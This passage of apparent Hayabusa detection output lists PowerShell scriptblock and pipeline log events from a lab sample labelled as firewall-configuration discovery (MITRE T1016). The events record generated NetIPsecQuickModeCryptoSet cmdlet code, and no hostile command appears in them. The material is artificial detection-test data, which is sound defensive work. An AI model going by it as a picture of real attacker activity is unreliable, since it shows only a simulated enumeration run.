${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecQuickModeCryptoSet' function Copy-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] 
${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvoca",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.020 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"tionInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecQuickModeCryptoSet'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated 
(PowerShell).evtx 2021-10-25 16:23:06.036 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.036 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.036 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.036 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network 
Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.036 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecQuickModeCryptoSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.036 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecQuickModeCryptoSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.036 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecQuickModeCryptoSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.036 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; 
value=""Remove-NetIPsecQuickModeCryptoSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.036 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecQuickModeCryptoSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.036 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecQuickModeCryptoSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.036 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { 
$__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.036 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function New-NetIPsecQuickModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('PfsGroup')] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, 
$script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 
